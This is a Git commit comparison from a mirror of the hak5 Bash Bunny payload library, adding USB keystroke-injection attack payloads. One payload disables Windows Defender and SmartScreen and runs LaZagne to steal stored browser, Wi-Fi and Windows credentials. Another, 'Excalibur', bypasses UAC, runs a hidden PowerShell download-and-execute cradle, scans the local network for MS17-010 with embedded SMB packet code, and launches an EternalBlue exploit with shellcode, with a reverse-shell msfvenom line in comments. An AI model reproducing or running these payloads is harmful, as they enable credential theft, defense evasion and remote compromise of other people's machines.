hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:fd5cf959f139bfbd98e3fbfdcde81b236b0166b1
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0
...
compare: hak5:1b8d0c09fbed682a15b10b200123396ec71e03f5
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0

13 Commits
fd5cf959f1 ... 1b8d0c09fb

Author SHA1 Message Date
Dvir S. 1b8d0c09fb
Merge ff49f78114 into 9bc2a0312d 2024-10-02 14:27:16 -04:00
Peaks 9bc2a0312d
Merge pull request #691 from rafa-guillermo/master 
Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny
 2024-10-02 13:52:59 -04:00
Rafa Guillermo f7cf46fd95
Update payload.ps1 
added missed $drivelabel reference
 2024-09-30 20:21:11 +02:00
Rafa Guillermo 774cc77212 fix shell.bat again 2024-09-30 13:15:25 +02:00
Rafa Guillermo 5da19abe97 updated payload to make drive label and switch generic 2024-09-30 13:14:28 +02:00
Rafa Guillermo b1cf7e8ef4 restore file 2024-09-30 07:16:26 +02:00
Rafa Guillermo 9bcb7f9240 restore quarantined file 2024-09-30 07:15:46 +02:00
Rafa Guillermo bf149a783b Update payload.txt 2024-09-29 20:00:26 +02:00
Rafa Guillermo bc36c76444 restore quarantined file in different bibrary 2024-09-29 19:55:05 +02:00
Rafa Guillermo 6a260cfd4b Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny 2024-09-29 17:06:22 +02:00
Dvir S. Sasson ff49f78114
Added Excalibur 2018-02-11 14:05:17 +02:00
Dviros 5257babf79 Unknown Change 2018-02-11 14:03:14 +02:00
Dvir S. Sasson cf78ba8430
Merge pull request #1 from hak5/master 
Pull
 2018-02-11 13:47:37 +02:00
8 changed files with 579 additions and 239 deletions
Show Stats Expand all files Collapse all files

6
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 Normal file
View File

@ -0,0 +1,6 @@
$drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

90
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt Normal file
View File

@ -0,0 +1,90 @@
#!/bin/bash
#
# Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.2
# Category: Credentials
# Target: Windows
# Tested On: Windows 11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## Set-up ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DRIVE_LABEL=BashBunny
######## Make Loot Dir ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
####### Open a powershell window with elevated privileges #######
LED STAGE1
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
# Disable Windows Defender File Scan and and Real Time Protection
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
QUACK ENTER
sleep 1
# Run laZagne
LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
QUACK ENTER
QUACK STRING \& \$scriptPath
QUACK ENTER
sleep 10
QUACK STRING exit
QUACK ENTER
# Re-enable Defender and Smart screen
LED CLEANUP
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
QUACK ENTER
sleep 1
QUACK STRING exit
QUACK ENTER
######## FINISH ########
LED FINISH

39
payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md Normal file
View File

@ -0,0 +1,39 @@
# NoDefenseAgainstLaZagne
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
* Version: 1.0
* Frimware support: 1.1 and higher
* Target version: Windows 11
* Tested on: Windows 11
## Description
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
4. Plug your BashBunny and Enjoy
## Info
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |

239
payloads/library/exfiltration/browserData/Get-BrowserData.ps1
View File

@ -1,239 +0,0 @@
function Get-BrowserInformation {
<#
.SYNOPSIS
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
and/or Firefox browsers on Windows machines.
.PARAMETER Browser
The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
.PARAMETER Datatype
Type of data to enumerate, 'History' or 'Bookmarks'
.PARAMETER UserName
Specific username to search browser information for.
.PARAMETER Search
Term to search for
.EXAMPLE
PS C:\> Get-BrowserInformation
Enumerates browser information for all supported browsers for all current users.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
Enumerates bookmarks for Internet Explorer for the user 'user1'.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
results matching the search term 'github'.
#>
[CmdletBinding()]
Param
(
[Parameter(Position = 0)]
[String[]]
[ValidateSet('Chrome','IE','FireFox', 'All')]
$Browser = 'All',
[Parameter(Position = 1)]
[String[]]
[ValidateSet('History','Bookmarks','All')]
$DataType = 'All',
[Parameter(Position = 2)]
[String]
$UserName = '',
[Parameter(Position = 3)]
[String]
$Search = ''
)
function ConvertFrom-Json20([object] $item){
#http://stackoverflow.com/a/29689642
Add-Type -AssemblyName System.Web.Extensions
$ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
return ,$ps_js.DeserializeObject($item)
}
function Get-ChromeHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find Chrome History for username: $UserName"
}
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Chrome'
DataType = 'History'
Data = $_
}
}
}
}
function Get-ChromeBookmarks {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
} else {
$Json = Get-Content $Path
$Output = ConvertFrom-Json20($Json)
$Jsonobject = $Output.roots.bookmark_bar.children
$Jsonobject.url |Sort -Unique | ForEach-Object {
if ($_ -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'Bookmark'
Data = $_
}
}
}
}
}
function Get-InternetExplorerHistory {
#https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
$Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
$Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach($Path in $Paths) {
$User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
$Path = $Path | Select-Object -ExpandProperty PSPath
$UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
if (-not (Test-Path -Path $UserPath)) {
Write-Verbose "[!] Could not find IE History for SID: $Path"
}
else {
Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
$Key = $_
$Key.GetValueNames() | ForEach-Object {
$Value = $Key.GetValue($_)
if ($Value -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'IE'
DataType = 'History'
Data = $Value
}
}
}
}
}
}
}
function Get-InternetExplorerBookmarks {
$URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
ForEach ($URL in $URLs) {
if ($URL.FullName -match 'Favorites') {
$User = $URL.FullName.split('\')[2]
Get-Content -Path $URL.FullName | ForEach-Object {
try {
if ($_.StartsWith('URL')) {
# parse the .url body to extract the actual bookmark location
$URL = $_.Substring($_.IndexOf('=') + 1)
if($URL -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $User
Browser = 'IE'
DataType = 'Bookmark'
Data = $URL
}
}
}
}
catch {
Write-Verbose "Error parsing url: $_"
}
}
}
}
}
function Get-FireFoxHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox History for username: $UserName"
}
else {
$Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
$Value.Value |ForEach-Object {
if ($_ -match $Search) {
ForEach-Object {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'History'
Data = $_
}
}
}
}
}
}
if (!$UserName) {
$UserName = "$ENV:USERNAME"
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-ChromeHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-ChromeBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-InternetExplorerHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-InternetExplorerBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-FireFoxHistory
}
}
}

42
payloads/library/exploitation/Excalibur/README.md Normal file
View File

@ -0,0 +1,42 @@
# If you enjoyed this tool and you found it useful, I'll be happy for donations at 39om67XSXi1eAQNTgLXufw1xwR897JMWwv. Thanks!
# Excalibur
Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project.
It's purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
Excalibur may be used only for demostrations purposes only, and the developers are not responsible to any misuse or illegal usage.
# What does it do?
When Excalibur gets connected to the machine, it will run the following:
1. Trys to bypass UAC, or just get administrative rights
2. Gets interface info (IP addresses) and build a network map inside a TXT file.
3. Scans port 445 for the known "MS10-17" ("EternalBlue") vulnerability in every segment found.
4. Exploits every machine and drop a shell to a remote machine.
# How to?
Follow the steps here to compile a shellcode:
https://github.com/vivami/MS17-010
1. Copy payload.txt to the switch folder.
2. Copy the "eternablblue_exploit7.py" and compile it using Pyinstaller:
* "pip install pyinstaller"
* "pyinstaller --onefile MS17-010\eternablblue_exploit7.py"
3. Add your shellcode and the compiled exploiter into "a.zip" and copy it to the "loot" folder".
* a.zip needs to contain a compiled, standalone eternalblue exploiter from "vivami's" repo and the shellcode.
4. Copy the powershell script to (p_v2.ps1) to the loot folder.
# TODO
1. Add persistency in terms of add a new user account, and persistent shell.
2. Exploit other machines and applications in the network, with the credentials added in the persistency step.
3. Exfiltrate sensitive data from the network, outside.
4. Bug fixes, and exploits stabilizations.
# Notes
Excalibur is still in Beta, bugs are iminent.

BIN
payloads/library/exploitation/Excalibur/a.zip Normal file
View File

Binary file not shown.

331
payloads/library/exploitation/Excalibur/p_v2.ps1 Normal file
View File

@ -0,0 +1,331 @@
Add-Type -AssemblyName System.IO.Compression.FileSystem
$ComputerName = $env:COMPUTERNAME
function InterfacesFinder(){
foreach ($Computer in $ComputerName) {
if(Test-Connection -ComputerName $Computer -Count 1 -ea 0) {
try {
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $Computer -EA Stop | ? {$_.IPEnabled}
} catch {
Write-Warning "Error occurred while querying $computer."
Continue
}
foreach ($Network in $Networks) {
$IPAddress = $Network.IpAddress[0]
$SubnetMask = $Network.IPSubnet[0]
if ($SubnetMask -eq '255.255.255.0'){
$SubnetBit = 24
}
if ($SubnetMask -eq '255.255.0.0'){
$SubnetBit = 16
}
if ($SubnetMask -eq '255.0.0.0'){
$SubnetBit = 8
}
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=0
$octet = $octet -join '.'
$octet = $octet+'/'+$SubnetBit
$targets = "$env:TEMP\targets.txt"
$octet | Out-File -Append -encoding ascii $targets
}
}
}
}
function PScanner(){
$Source = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace PingCastle.Scanners
{
public class ms17_010scanner
{
static public bool ScanForMs17_010(string computer)
{
Trace.WriteLine("Checking " + computer + " for MS17-010");
TcpClient client = new TcpClient();
client.Connect(computer, 445);
try
{
NetworkStream stream = client.GetStream();
byte[] negotiatemessage = GetNegotiateMessage();
stream.Write(negotiatemessage, 0, negotiatemessage.Length);
stream.Flush();
byte[] response = ReadSmbResponse(stream);
if (!(response[8] == 0x72 && response[9] == 00))
{
throw new InvalidOperationException("invalid negotiate response");
}
byte[] sessionSetup = GetSessionSetupAndXRequest(response);
stream.Write(sessionSetup, 0, sessionSetup.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x73 && response[9] == 00))
{
throw new InvalidOperationException("invalid sessionSetup response");
}
byte[] treeconnect = GetTreeConnectAndXRequest(response, computer);
stream.Write(treeconnect, 0, treeconnect.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x75 && response[9] == 00))
{
throw new InvalidOperationException("invalid TreeConnect response");
}
byte[] peeknamedpipe = GetPeekNamedPipe(response);
stream.Write(peeknamedpipe, 0, peeknamedpipe.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (response[8] == 0x25 && response[9] == 0x05 && response[10] ==0x02 && response[11] ==0x00 && response[12] ==0xc0 )
{
return true;
}
}
catch (Exception)
{
throw;
}
return false;
}
private static byte[] ReadSmbResponse(NetworkStream stream)
{
byte[] temp = new byte[4];
stream.Read(temp, 0, 4);
int size = temp[3] + temp[2] * 0x100 + temp[3] * 0x10000;
byte[] output = new byte[size + 4];
stream.Read(output, 4, size);
Array.Copy(temp, output, 4);
return output;
}
static byte[] GetNegotiateMessage()
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x72, // SMB Command: Negotiate Protocol (0x72)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
0x00,0x00, // Tree id 0
0x44,0x6d, // Process ID 27972
0x00,0x00, // User ID 0
0x42,0xc1, // Multiplex ID 49474
0x00, // WCT 0
0x31,0x00, // BCC 49
0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00, // LANMAN1.0
0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x00, // LM1.2X002
0x02,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x00, // NT LANMAN 1.0
0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00, // NT LM 0.12
};
return EncodeNetBiosLength(output);
}
static byte[] GetSessionSetupAndXRequest(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x73, // SMB Command: Session Setup AndX (0x73)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x0d, // WCT 0
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved 00
0x00,0x00, // AndXOffset: 0
0xdf,0xff, // Max Buffer: 65503
0x02,0x00, // Max Mpx Count: 2
0x01,0x00, // VC Number: 1
0x00,0x00,0x00,0x00, // Session Key: 0x00000000
0x00,0x00, // ANSI Password Length: 0
0x00,0x00, // Unicode Password Length: 0
0x00,0x00,0x00,0x00, // Reserved: 00000000
0x40,0x00,0x00,0x00, // Capabilities: 0x00000040, NT Status Codes
0x26,0x00, // Byte Count (BCC): 38
0x00, // Account:
0x2e,0x00, // Primary Domain: .
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x32,0x31,0x39,0x35,0x00, // Native OS: Windows 2000 2195
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x35,0x2e,0x30,0x00 // Native LAN Manager: Windows 2000 5.0
};
return EncodeNetBiosLength(output);
}
private static byte[] EncodeNetBiosLength(byte[] input)
{
byte[] len = BitConverter.GetBytes(input.Length-4);
input[3] = len[0];
input[2] = len[1];
input[1] = len[2];
return input;
}
static byte[] GetTreeConnectAndXRequest(byte[] data, string computer)
{
MemoryStream ms = new MemoryStream();
BinaryReader reader = new BinaryReader(ms);
byte[] part1 = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x75, // SMB Command: Tree Connect AndX (0x75)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x04, // WCT 4
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved: 00
0x00,0x00, // AndXOffset: 0
0x00,0x00, // Flags: 0x0000
0x01,0x00, // Password Length: 1
0x19,0x00, // Byte Count (BCC): 25
0x00, // Password: 00
0x5c,0x5c};
byte[] part2 = new byte[] {
0x5c,0x49,0x50,0x43,0x24,0x00, // Path: \\ip_target\IPC$
0x3f,0x3f,0x3f,0x3f,0x3f,0x00
};
ms.Write(part1, 0, part1.Length);
byte[] encodedcomputer = new ASCIIEncoding().GetBytes(computer);
ms.Write(encodedcomputer, 0, encodedcomputer.Length);
ms.Write(part2, 0, part2.Length);
ms.Seek(0, SeekOrigin.Begin);
byte[] output = reader.ReadBytes((int) reader.BaseStream.Length);
return EncodeNetBiosLength(output);
}
static byte[] GetPeekNamedPipe(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x25, // SMB Command: Trans (0x25)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x10, // Word Count (WCT): 16
0x00,0x00, // Total Parameter Count: 0
0x00,0x00, // Total Data Count: 0
0xff,0xff, // Max Parameter Count: 65535
0xff,0xff, // Max Data Count: 65535
0x00, // Max Setup Count: 0
0x00, // Reserved: 00
0x00,0x00, // Flags: 0x0000
0x00,0x00,0x00,0x00, // Timeout: Return immediately (0)
0x00,0x00, // Reserved: 0000
0x00,0x00, // Parameter Count: 0
0x4a,0x00, // Parameter Offset: 74
0x00,0x00, // Data Count: 0
0x4a,0x00, // Data Offset: 74
0x02, // Setup Count: 2
0x00, // Reserved: 00
0x23,0x00, // Function: PeekNamedPipe (0x0023)
0x00,0x00, // FID: 0x0000
0x07,0x00, // Byte Count (BCC): 7
0x5c,0x50,0x49,0x50,0x45,0x5c,0x00 // Transaction Name: \PIPE\
};
return EncodeNetBiosLength(output);
}
}
}
"@
Add-Type -TypeDefinition $Source
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $env:COMPUTERNAME -EA Stop | ? {$_.IPEnabled}
$ping = New-Object System.Net.NetworkInformation.Ping
$a = 1
$z = 254
while ($a -le $z) {
foreach($network in $networks){
$IPAddress = $Network.IpAddress[0]
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=$a
$octet = $octet -join '.'
if($ping.send($octet,"50").status -eq "Success"){
try{
if ([PingCastle.Scanners.ms17_010scanner]::ScanForMs17_010($octet) -eq "True"){
Write-Output "Machine $octet is vulnerable!" > $env:Temp\results.txt
}
}
catch{
}
}
}
$a++
}
}
function Unzip
{
param([string]$zipfile, [string]$outpath)
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
function Exploit(){
$results = Get-Content "$env:TEMP\results.txt"
#Meterpreter: Generate a new binary payload, call it .raw and copy it to the temp folder
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=31337 -f raw > meterpreter.raw
#$meterpreter = Get-Content "$env:TEMP\meterpreter.raw"
#$shellcode = Get-Content "$env:TEMP\shellcode.bin"
#Combines the binary ASM shellcode and the binary meterpreter payload
#$shellcode | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
#$meterpreter | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
foreach ($result in $results) {
#Invoke-EternalBlue -target $result -max_attempts 3 -initial_grooms 12
& $env:TEMP\eternalblue_exploit7.exe $result $env:TEMP'\shellcode_kali.bin' '12'
}
}
InterfacesFinder
powershell Start-Sleep 1 ;
PScanner
powershell Start-Sleep 1 ;
Invoke-WebRequest 'http://172.16.64.1/a.zip' -OutFile "$env:TEMP\a.zip"
Unzip $env:Tmp"\a.zip" $env:Tmp"\"
Exploit
#TODO
#persistency
#Add a new user account.
#Obfuscation
#delete temp files, Generate a report to the loot folder.

71
payloads/library/exploitation/Excalibur/payload.txt Normal file
View File

@ -0,0 +1,71 @@
#!/bin/bash
# .-.
# (0.0)
# '=.|m|.='
# .='/@\`=.
# @8@
# _ 8@8 _
# (@__/@8@\__@)
# `-=:8@8:=-'
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# \:/
# ^
#
# Title: Excalibur
# Author: Dviros, Dora
# Version: 1.0
#
# Excalibur is an APT based "Powershell" for the Bashbunny project.
# Its purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/Excalibur
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p_v2.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
sleep 60
done